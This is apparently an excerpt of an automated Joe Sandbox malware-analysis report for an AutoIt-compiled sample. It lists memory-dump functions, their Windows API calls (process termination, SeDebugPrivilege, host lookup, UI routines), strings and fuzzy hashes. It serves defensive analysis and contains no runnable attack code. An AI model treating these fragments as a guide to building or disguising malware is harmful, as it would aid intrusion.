TerminateProcess.KERNEL32(00000000,00000000), ref: 001AA268
GetLastError.KERNEL32(00000000), ref: 001AA273
CloseHandle.KERNEL32(00000000), ref: 001AA2C4

Strings

SeDebugPrivilege, xrefs: 001AA18F

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: adc4c23daab67ce5494ee6d720eab1bf2e5a990b060b14b73f430af06fa6b008
Instruction ID: 1503cbd45dfc430195a59205008f046c8e1463122b4d8d16faac2027a299992c
Opcode Fuzzy Hash: adc4c23daab67ce5494ee6d720eab1bf2e5a990b060b14b73f430af06fa6b008
Instruction Fuzzy Hash: F461A034204242AFD720DF18D494F2ABBE1AF55318F54849DE4668BBA3C772ED49CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 001B3886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 001B3925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 001B393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 001B3954
_wcslen.LIBCMT ref: 001B3999
SendMessageW.USER32(?,00001057,00000000,?), ref: 001B39C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 001B39F4

Strings

SysListView32, xrefs: 001B38F7

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: b10f36472266a05a09cb5b8da550cab61432e9b5a7e7975e4c50d76e7dd8d7b1
Instruction ID: d89d327ffcef15e57ccd27f5289fb096d48b6bec215202c2478d8c774f6d721c
Opcode Fuzzy Hash: b10f36472266a05a09cb5b8da550cab61432e9b5a7e7975e4c50d76e7dd8d7b1
Instruction Fuzzy Hash: D941A571A00219BBEF219F64CC49FEA7BA9FF18354F100526F968E7291D7B19D90CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0018BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0018BCFD
IsMenu.USER32(00000000), ref: 0018BD1D
CreatePopupMenu.USER32 ref: 0018BD53
GetMenuItemCount.USER32(01787028), ref: 0018BDA4
InsertMenuItemW.USER32(01787028,?,00000001,00000030), ref: 0018BDCC

Strings

2, xrefs: 0018BD37
0, xrefs: 0018BCA8

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 4ac2a96edec609bcc727d418ab338cafd78a454806c08aadb4f941fc81056a6d
Instruction ID: ccb46beee5bfe436cb29d95b99e1f5a70cd7b8a9dc46b8a660132e72891cb956
Opcode Fuzzy Hash: 4ac2a96edec609bcc727d418ab338cafd78a454806c08aadb4f941fc81056a6d
Instruction Fuzzy Hash: 31519E70A08205ABDB20EFE8D8C4BAEBBF4AF55318F144319E451972A1D7709A45CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0018C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0018C913

Strings

blank, xrefs: 0018C895
stop, xrefs: 0018C8E4
info, xrefs: 0018C8B4
question, xrefs: 0018C8CC
warning, xrefs: 0018C8FC

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: a585bbe0b5f6c9d2309572c5db1076678067cb7b0078a295dec10599d5a0db8b
Instruction ID: ef30db56b92468008dff9a89eb80bde28c1b4a976cf1d01156096260296418a4
Opcode Fuzzy Hash: a585bbe0b5f6c9d2309572c5db1076678067cb7b0078a295dec10599d5a0db8b
Instruction Fuzzy Hash: F7115B31A89B06BBE7047B109C83DAE339CDF25368B61006FF500A6282E7745F405BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0018DE27 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 0018DE42
gethostname.WSOCK32(?,00000100), ref: 0018DE5C
gethostbyname.WSOCK32(?), ref: 0018DE69
inet_ntoa.WSOCK32(?), ref: 0018DEAB
_strcat.LIBCMT ref: 0018DEB9
WSACleanup.WSOCK32 ref: 0018DEDE

Strings

0.0.0.0, xrefs: 0018DE87

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: 5d4f524108d7a40b633312a05497f12fd20b5cddd9bf408888f22d85f173e710
Instruction ID: b6bf12f8e2827c5c32808a4c603ebd30b0edc1c4b161d7b0bb563cab3f02680b
Opcode Fuzzy Hash: 5d4f524108d7a40b633312a05497f12fd20b5cddd9bf408888f22d85f173e710
Instruction Fuzzy Hash: AE112971904205AFDB24BB24EC4AEEE77BCDF25710F0101A9F545AA0E1EF719B818FA0

Uniqueness

Uniqueness Score: -1.00%

Function 0018ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0018ED2A
_wcslen.LIBCMT ref: 0018ED3B
_wcslen.LIBCMT ref: 0018ED79
_wcslen.LIBCMT ref: 0018EDAF
_wcslen.LIBCMT ref: 0018EDDF
_wcslen.LIBCMT ref: 0018EDEF
_wcslen.LIBCMT ref: 0018EE2B
_wcslen.LIBCMT ref: 0018EE5A

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 99ad88c685b92c906161a3196ae2c671ebc3610d8bc6785da650bcdef6d86b19
Instruction ID: 3529a9db8a5f48c746a3cd6ac99ee9f00e85527cca843f39e134f8c718cc617c
Opcode Fuzzy Hash: 99ad88c685b92c906161a3196ae2c671ebc3610d8bc6785da650bcdef6d86b19
Instruction Fuzzy Hash: 20418D65C1021876CB11FBF4C88AADFB7A8AF55710F508562E518E3122EB34E356C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 0013F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0017682C,00000004,00000000,00000000), ref: 0013F953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0017682C,00000004,00000000,00000000), ref: 0017F3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0017682C,00000004,00000000,00000000), ref: 0017F454

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 64799ff2638b5475c076af817abad68f860323b0d77a95cd12030801374039cf
Instruction ID: 00be9d804179fe2323b937159a676fddcf2c26199082bf9c9ff098d5463a7403
Opcode Fuzzy Hash: 64799ff2638b5475c076af817abad68f860323b0d77a95cd12030801374039cf
Instruction Fuzzy Hash: 7E41DA31A08640FBD7399B29888877B7BA2BB56328F15853CF04B56A61D772A8C3C751

Uniqueness

Uniqueness Score: -1.00%

Function 001B2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 001B2D1B
GetDC.USER32(00000000), ref: 001B2D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 001B2D2E
ReleaseDC.USER32(00000000,00000000), ref: 001B2D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 001B2D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 001B2D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,001B5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 001B2DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 001B2DE1

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 4c259c9052369133f401269ba9402dd3e5e240d646cd814a92147e6ed0351dd4
Instruction ID: 92641ccd2a83552f5bdfe0309570c3b4926e21f08707b65cce1ffe892c8a556c
Opcode Fuzzy Hash: 4c259c9052369133f401269ba9402dd3e5e240d646cd814a92147e6ed0351dd4
Instruction Fuzzy Hash: 65316976201214BBEB218F54CC8AFEB3BA9EF49715F044155FE089A291C7B59C91CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00185622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00185637
_memcmp.LIBVCRUNTIME ref: 00185659
_memcmp.LIBVCRUNTIME ref: 00185671
_memcmp.LIBVCRUNTIME ref: 00185684
_memcmp.LIBVCRUNTIME ref: 0018569E
_memcmp.LIBVCRUNTIME ref: 001856B1
_memcmp.LIBVCRUNTIME ref: 001856C9
_memcmp.LIBVCRUNTIME ref: 001856E4

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: cdd739d17407bf104862cae28731c0475ae518ed15e89e6936ef72364d1448f8
Instruction ID: a9a31faa9b24f5a2beaecf2115ee520707d39cbc6eb92204eb390f2470096ede
Opcode Fuzzy Hash: cdd739d17407bf104862cae28731c0475ae518ed15e89e6936ef72364d1448f8
Instruction Fuzzy Hash: 3121A761650A0977D7187920CE82FFA375FFF20394FA44024FD049A581F721EF518BA5

Uniqueness

Uniqueness Score: -1.00%

Function 001A4FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 001A5007
NULL Pointer assignment, xrefs: 001A502E, 001A5383

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 1d1c3a2dcd657bd12aec6e4488230a79771d522357592f727f944fa0675af214
Instruction ID: 9e4df753db8df8e3b31a5cd9b42c17350f472f36644424104dfceda2c1549c7b
Opcode Fuzzy Hash: 1d1c3a2dcd657bd12aec6e4488230a79771d522357592f727f944fa0675af214
Instruction Fuzzy Hash: CFD1D479A0460AAFDF14CFA8C880BAEB7B6FF49344F158069F915AB281D770DD45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00161522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 001615CE
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00161651
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 001616E4
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 001616FB

Part of subcall function 00153820: RtlAllocateHeap.NTDLL(00000000,?,001F1444,?,0013FDF5,?,?,0012A976,00000010,001F1440,001213FC,?,001213C6,?,00121129), ref: 00153852

MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00161777
__freea.LIBCMT ref: 001617A2
__freea.LIBCMT ref: 001617AE

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: a791097c9a1fa0b75b1baef5c8385e090dae8768e5e8b5a3bfe6ee5aec96019d
Instruction ID: a3a932f143ebb9e3da5e3e60e3ba04017b00e5958a5cd144d50bde62725f7514
Opcode Fuzzy Hash: a791097c9a1fa0b75b1baef5c8385e090dae8768e5e8b5a3bfe6ee5aec96019d
Instruction Fuzzy Hash: 8591D372E00216BADB248EB4CC91AEEBBB5AF49310F1C4659E902E7190DB35CD54CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001A4523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 001A4648
VariantInit.OLEAUT32(?), ref: 001A4749
VariantClear.OLEAUT32(?), ref: 001A4753
VariantClear.OLEAUT32(?), ref: 001A47B0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 001A472C
Null Object assignment in FOR..IN loop, xrefs: 001A45D8, 001A4706, 001A47BE

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 9abdb6a2bdbfca7ffb80053c89606008f8ae4e192cc0a5c2e47adddfc58dc019
Instruction ID: ec4e6a3cda8f17a17db68ee718ef256940582fbc1cd0b1899e8028e3d41bf01c
Opcode Fuzzy Hash: 9abdb6a2bdbfca7ffb80053c89606008f8ae4e192cc0a5c2e47adddfc58dc019
Instruction Fuzzy Hash: 6191AF75E00219AFDF24CFA5D884FAEBBB8EF86710F108559F505AB281D7B09945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00191187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0019125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00191284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 001912A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001912D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0019135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001913C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00191430

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 3ea6df30640e81ea5b44198762349aaad276c9c6324ceaf7f7ef8c2153e1d93b
Instruction ID: 40af2da8e853c9515507d4014bb218170a0530a4e8d9582a77ed25b6c2086453
Opcode Fuzzy Hash: 3ea6df30640e81ea5b44198762349aaad276c9c6324ceaf7f7ef8c2153e1d93b
Instruction Fuzzy Hash: 7491D575A0021AAFDF01DFA4C885BFE77B5FF58315F214429E900EB291D774A981CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0013948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 7027363f0d21061e12eb7fedad9b5f79d7db63f01305ce992eaec08bfc8ee2e5
Instruction ID: fca4a5ae4e7df87a2559b7ea56b13d814507ca4daf858a46563bc4530f7d4bd2
Opcode Fuzzy Hash: 7027363f0d21061e12eb7fedad9b5f79d7db63f01305ce992eaec08bfc8ee2e5
Instruction Fuzzy Hash: 6E911571E00219EFCB15CFA9C884AEEBBB8FF49320F148556E515B7291D374A981CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001A3947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 001A396B
CharUpperBuffW.USER32(?,?), ref: 001A3A7A
_wcslen.LIBCMT ref: 001A3A8A
VariantClear.OLEAUT32(?), ref: 001A3C1F

Part of subcall function 00190CDF: VariantInit.OLEAUT32(00000000), ref: 00190D1F
Part of subcall function 00190CDF: VariantCopy.OLEAUT32(?,?), ref: 00190D28
Part of subcall function 00190CDF: VariantClear.OLEAUT32(?), ref: 00190D34

Strings

Incorrect Parameter format, xrefs: 001A39A6, 001A3BA1
AUTOIT.ERROR, xrefs: 001A3A80, 001A3A85

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: d15fc41cea4daa0b66fd76c6a5521cd38eadb4669aa614a7fb85d4964d007f42
Instruction ID: 747473b1a5845334df67402663a7d9e0de8806859098ef3eda87e0d552c6ea09
Opcode Fuzzy Hash: d15fc41cea4daa0b66fd76c6a5521cd38eadb4669aa614a7fb85d4964d007f42
Instruction Fuzzy Hash: A8917A796083059FC704DF28D480A6AB7E5FF9A314F14892DF89A9B351DB30EE45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 001A4BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 0018000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0017FF41,80070057,?,?,?,0018035E), ref: 0018002B
Part of subcall function 0018000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0017FF41,80070057,?,?), ref: 00180046
Part of subcall function 0018000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0017FF41,80070057,?,?), ref: 00180054
Part of subcall function 0018000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0017FF41,80070057,?), ref: 00180064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 001A4C51
_wcslen.LIBCMT ref: 001A4D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 001A4DCF
CoTaskMemFree.OLE32(?), ref: 001A4DDA

Strings

NULL Pointer assignment, xrefs: 001A4E23, 001A4E52

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 948eb440bc82906a79b55f1f9f8c32add107081d777e43176f8392c239af14dc
Instruction ID: 3adb6099d40e7564aefa1c49aa7c9a756a6510938ab6de7faddc7e746aa9f7fe
Opcode Fuzzy Hash: 948eb440bc82906a79b55f1f9f8c32add107081d777e43176f8392c239af14dc
Instruction Fuzzy Hash: 38914871D0022DEFDF14DFA4D880AEEB7B8BF59310F108169E915AB251EB749A54CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 001B20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 001B2183
